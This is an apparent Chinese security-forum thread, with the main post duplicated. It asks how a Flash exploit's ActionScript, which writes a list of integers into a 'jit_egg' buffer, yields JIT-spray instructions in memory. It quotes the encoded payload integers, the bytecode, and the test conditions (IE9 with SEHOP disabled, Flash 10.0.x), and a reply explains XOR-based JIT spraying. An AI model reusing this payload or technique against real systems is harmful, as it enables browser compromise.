-
-
[求助+讨论]jit spray的一个实例的疑惑
-
发表于: 2011-9-1 09:11
-
比如一个swf文件,它的中间代码大概是这样:
_as3_pushint 156456771
_as3_callpropvoid writeInt(param count:1)
_as3_getlocal <0>
_as3_getproperty jit_egg
_as3_pushint 1359
_as3_callpropvoid writeInt(param count:1)
_as3_getlocal <0>
_as3_getproperty jit_egg
_as3_pushdouble 2462964344
_as3_callpropvoid writeInt(param count:1)
_as3_getlocal <0>
_as3_getproperty jit_egg
_as3_pushint 1163161579
反汇编源代码是这样:
function pageLoadEx()
{
var _loc_1:* = new Loader();
this.jit_egg.endian = Endian.LITTLE_ENDIAN;
this.jit_egg.writeInt(156456771);
this.jit_egg.writeInt(1359);
this.jit_egg.writeInt(2462964344);
this.jit_egg.writeInt(1163161579);
this.jit_egg.writeInt(1986512408);
this.jit_egg.writeInt(3174682486);
this.jit_egg.writeInt(2720797961);
this.jit_egg.writeInt(3495836630);
this.jit_egg.writeInt(3212324519);
this.jit_egg.writeInt(1429101399);
this.jit_egg.writeInt(3932031664);
this.jit_egg.writeInt(635156349);
this.jit_egg.writeInt(3547179436);
this.jit_egg.writeInt(1407471022);
this.jit_egg.writeInt(1971932635);
this.jit_egg.writeInt(277404755);
this.jit_egg.writeInt(2327105845);
this.jit_egg.writeInt(1829846665);
this.jit_egg.writeInt(877160627);
this.jit_egg.writeInt(403690194);
this.jit_egg.writeInt(2292273698);
this.jit_egg.writeInt(3686507624);
this.jit_egg.writeInt(3205928413);
this.jit_egg.writeInt(117197396);
this.jit_egg.writeInt(81108174);
this.jit_egg.writeInt(2627472381);
this.jit_egg.writeInt(4013816252);
this.jit_egg.writeInt(1003287484);
this.jit_egg.writeInt(2488116851);
this.jit_egg.writeInt(3203958118);
但在内存中就变成了 0x3c909090 之类的,也就是write jit spray for fun 那篇文章中提到的类似xor指令序列了
这些整数我都看过,转成16进制直接看,貌似跟0x3c909090没半点关系,但在内存中就变成了90 90 90 3c 35之类的攻击指令了
代码链接见:6f1K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5M7r3I4G2K9i4c8Q4x3X3c8V1j5W2)9J5k6h3y4G2L8g2)9J5c8X3g2^5M7r3I4G2K9i4c8K6i4K6u0r3x3e0b7#2z5e0W2Q4x3V1j5`.
这是一个插件漏洞,漏洞没什么用,不值得去分析,找出来是想讨论下jit spray。那个swf文件是怎么喷射的,怎么就在内存中形成了90 90 90 3c 35之类的指令了??
我在windows7的ie9下测试,ok~~ 前提是把ie9的sehop保护先去掉(这跟这个漏洞的原理有关了)~~ flash player必须是10.0.X的,这个你懂的。 执行完后,若成功,转到06fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5M7r3I4G2K9i4c8Q4x3X3c8V1j5W2)9J5k6h3y4G2L8g2!0q4z5q4!0n7c8W2)9&6z5g2!0q4y4q4!0n7z5q4!0m8b7g2!0q4y4#2!0n7c8q4)9&6x3g2!0q4y4#2!0m8b7W2)9&6z5g2!0q4c8W2!0n7b7#2)9^5b7#2!0q4z5g2)9^5y4#2)9^5b7#2!0q4z5g2)9&6c8q4!0m8x3W2!0q4y4#2)9&6b7g2)9^5y4q4!0q4y4q4!0n7b7W2!0m8x3#2!0q4y4#2!0m8x3q4)9^5x3g2!0q4y4W2)9^5z5q4)9&6x3g2!0q4y4W2!0n7x3W2!0m8x3g2!0q4y4q4!0n7b7W2)9&6y4q4!0q4y4#2!0n7b7W2)9^5y4W2!0q4y4g2)9^5z5q4)9^5y4W2!0q4y4W2)9&6c8g2)9&6x3q4!0q4z5q4!0n7c8W2)9^5y4#2!0q4c8W2!0n7b7#2)9^5b7#2!0q4y4W2)9^5z5g2)9^5x3q4!0q4y4q4!0n7b7W2!0m8y4g2!0q4y4W2)9&6b7#2)9^5z5g2!0q4y4W2!0n7x3W2!0m8x3g2!0q4y4W2)9&6b7#2)9^5z5g2!0q4y4W2)9&6b7#2!0m8z5q4!0q4z5g2!0m8z5g2!0m8b7#2!0q4y4q4!0n7z5g2)9^5b7W2!0q4y4#2!0n7x3g2!0n7b7W2!0q4y4#2)9&6b7g2)9^5y4q4!0q4c8W2!0n7b7#2)9^5b7#2!0q4y4W2)9^5z5q4)9&6x3g2!0q4y4W2)9&6y4#2!0m8x3q4!0q4y4W2!0n7x3#2)9&6y4g2!0q4y4q4!0n7c8W2)9&6c8q4!0q4z5q4!0m8c8W2)9^5x3g2!0q4x3#2)9^5x3q4)9^5x3W2!0q4x3#2)9^5x3q4)9^5x3W2!0q4x3#2)9^5x3q4)9^5x3W2!0q4x3#2)9^5x3q4)9^5x3W2!0q4x3#2)9^5x3q4)9^5x3W2!0q4x3#2)9^5x3q4)9^5x3W2!0q4x3#2)9^5x3q4)9^5x3W2!0q4y4q4!0n7c8q4)9^5y4W2!0q4y4W2!0m8c8W2)9&6y4g2!0q4y4#2!0m8b7W2)9&6c8W2!0q4y4W2)9&6z5q4!0m8c8X3g2^5M7r3I4G2K9i4c8Q4x3X3c8V1j5W2!0q4y4#2)9&6b7g2)9^5y4q4!0q4c8W2!0n7b7#2)9^5b7#2!0q4y4g2!0n7b7g2)9&6y4q4!0q4z5q4!0m8c8W2!0m8y4g2!0q4y4W2!0n7x3W2!0m8x3g2!0q4y4q4!0n7b7W2)9^5x3q4!0q4y4q4!0n7z5g2)9^5z5q4!0q4y4W2)9^5x3g2!0n7y4W2!0q4y4W2)9^5y4q4)9^5c8W2)9%4c8g2)9%4c8b7`.`.
望大家多多指教~~
_as3_pushint 156456771
_as3_callpropvoid writeInt(param count:1)
_as3_getlocal <0>
_as3_getproperty jit_egg
_as3_pushint 1359
_as3_callpropvoid writeInt(param count:1)
_as3_getlocal <0>
_as3_getproperty jit_egg
_as3_pushdouble 2462964344
_as3_callpropvoid writeInt(param count:1)
_as3_getlocal <0>
_as3_getproperty jit_egg
_as3_pushint 1163161579
反汇编源代码是这样:
function pageLoadEx()
{
var _loc_1:* = new Loader();
this.jit_egg.endian = Endian.LITTLE_ENDIAN;
this.jit_egg.writeInt(156456771);
this.jit_egg.writeInt(1359);
this.jit_egg.writeInt(2462964344);
this.jit_egg.writeInt(1163161579);
this.jit_egg.writeInt(1986512408);
this.jit_egg.writeInt(3174682486);
this.jit_egg.writeInt(2720797961);
this.jit_egg.writeInt(3495836630);
this.jit_egg.writeInt(3212324519);
this.jit_egg.writeInt(1429101399);
this.jit_egg.writeInt(3932031664);
this.jit_egg.writeInt(635156349);
this.jit_egg.writeInt(3547179436);
this.jit_egg.writeInt(1407471022);
this.jit_egg.writeInt(1971932635);
this.jit_egg.writeInt(277404755);
this.jit_egg.writeInt(2327105845);
this.jit_egg.writeInt(1829846665);
this.jit_egg.writeInt(877160627);
this.jit_egg.writeInt(403690194);
this.jit_egg.writeInt(2292273698);
this.jit_egg.writeInt(3686507624);
this.jit_egg.writeInt(3205928413);
this.jit_egg.writeInt(117197396);
this.jit_egg.writeInt(81108174);
this.jit_egg.writeInt(2627472381);
this.jit_egg.writeInt(4013816252);
this.jit_egg.writeInt(1003287484);
this.jit_egg.writeInt(2488116851);
this.jit_egg.writeInt(3203958118);
但在内存中就变成了 0x3c909090 之类的,也就是write jit spray for fun 那篇文章中提到的类似xor指令序列了
这些整数我都看过,转成16进制直接看,貌似跟0x3c909090没半点关系,但在内存中就变成了90 90 90 3c 35之类的攻击指令了
代码链接见:6f1K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5M7r3I4G2K9i4c8Q4x3X3c8V1j5W2)9J5k6h3y4G2L8g2)9J5c8X3g2^5M7r3I4G2K9i4c8K6i4K6u0r3x3e0b7#2z5e0W2Q4x3V1j5`.
这是一个插件漏洞,漏洞没什么用,不值得去分析,找出来是想讨论下jit spray。那个swf文件是怎么喷射的,怎么就在内存中形成了90 90 90 3c 35之类的指令了??
我在windows7的ie9下测试,ok~~ 前提是把ie9的sehop保护先去掉(这跟这个漏洞的原理有关了)~~ flash player必须是10.0.X的,这个你懂的。 执行完后,若成功,转到06fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5M7r3I4G2K9i4c8Q4x3X3c8V1j5W2)9J5k6h3y4G2L8g2!0q4z5q4!0n7c8W2)9&6z5g2!0q4y4q4!0n7z5q4!0m8b7g2!0q4y4#2!0n7c8q4)9&6x3g2!0q4y4#2!0m8b7W2)9&6z5g2!0q4c8W2!0n7b7#2)9^5b7#2!0q4z5g2)9^5y4#2)9^5b7#2!0q4z5g2)9&6c8q4!0m8x3W2!0q4y4#2)9&6b7g2)9^5y4q4!0q4y4q4!0n7b7W2!0m8x3#2!0q4y4#2!0m8x3q4)9^5x3g2!0q4y4W2)9^5z5q4)9&6x3g2!0q4y4W2!0n7x3W2!0m8x3g2!0q4y4q4!0n7b7W2)9&6y4q4!0q4y4#2!0n7b7W2)9^5y4W2!0q4y4g2)9^5z5q4)9^5y4W2!0q4y4W2)9&6c8g2)9&6x3q4!0q4z5q4!0n7c8W2)9^5y4#2!0q4c8W2!0n7b7#2)9^5b7#2!0q4y4W2)9^5z5g2)9^5x3q4!0q4y4q4!0n7b7W2!0m8y4g2!0q4y4W2)9&6b7#2)9^5z5g2!0q4y4W2!0n7x3W2!0m8x3g2!0q4y4W2)9&6b7#2)9^5z5g2!0q4y4W2)9&6b7#2!0m8z5q4!0q4z5g2!0m8z5g2!0m8b7#2!0q4y4q4!0n7z5g2)9^5b7W2!0q4y4#2!0n7x3g2!0n7b7W2!0q4y4#2)9&6b7g2)9^5y4q4!0q4c8W2!0n7b7#2)9^5b7#2!0q4y4W2)9^5z5q4)9&6x3g2!0q4y4W2)9&6y4#2!0m8x3q4!0q4y4W2!0n7x3#2)9&6y4g2!0q4y4q4!0n7c8W2)9&6c8q4!0q4z5q4!0m8c8W2)9^5x3g2!0q4x3#2)9^5x3q4)9^5x3W2!0q4x3#2)9^5x3q4)9^5x3W2!0q4x3#2)9^5x3q4)9^5x3W2!0q4x3#2)9^5x3q4)9^5x3W2!0q4x3#2)9^5x3q4)9^5x3W2!0q4x3#2)9^5x3q4)9^5x3W2!0q4x3#2)9^5x3q4)9^5x3W2!0q4y4q4!0n7c8q4)9^5y4W2!0q4y4W2!0m8c8W2)9&6y4g2!0q4y4#2!0m8b7W2)9&6c8W2!0q4y4W2)9&6z5q4!0m8c8X3g2^5M7r3I4G2K9i4c8Q4x3X3c8V1j5W2!0q4y4#2)9&6b7g2)9^5y4q4!0q4c8W2!0n7b7#2)9^5b7#2!0q4y4g2!0n7b7g2)9&6y4q4!0q4z5q4!0m8c8W2!0m8y4g2!0q4y4W2!0n7x3W2!0m8x3g2!0q4y4q4!0n7b7W2)9^5x3q4!0q4y4q4!0n7z5g2)9^5z5q4!0q4y4W2)9^5x3g2!0n7y4W2!0q4y4W2)9^5y4q4)9^5c8W2)9%4c8g2)9%4c8b7`.`.
望大家多多指教~~
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
|
|
|
|
|
|
|
|
这个我查过了,字节码的静态对应关系我还是能够理解的,比如上面的一部分代码的二进制和其伪码表示:
//d0 _as3_getlocal <0> //66 02 _as3_getproperty jit_egg //2d 3e _as3_pushint 156456771 //4f 01 01 _as3_callpropvoid writeInt(param count:1) 比如这里的d0就表示getlocal的指令码 我疑惑的是这样一段代码被jit加载后怎么就生成了90 90 90 3c 35这样的指令序列 对于jit spray最初的两篇文献中讲到到的通过异或写攻击代码,我想我还是能够理解的。 它的中间代码是这样的: //2d 01 _as3_pushint 1016107152 //2d 01 _as3_pushint 1016107152 //aa _as3_bitxor //2d 01 _as3_pushint 1016107152 //aa _as3_bitxor //2d 01 _as3_pushint 1016107152 //aa _as3_bitxor 这里的1016107152 就是 3c909090,加载到内存中形成 90 90 90 3c 35 这样的指令序列还是容易理解的,但前面那个压根就没有这样的数据。 如果将一段shellcode改成采用xor的jit spray方式,我想这是不难的~~ 但通过writeInt这个 该怎么玩了, 它那些整数有什么规律么?
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
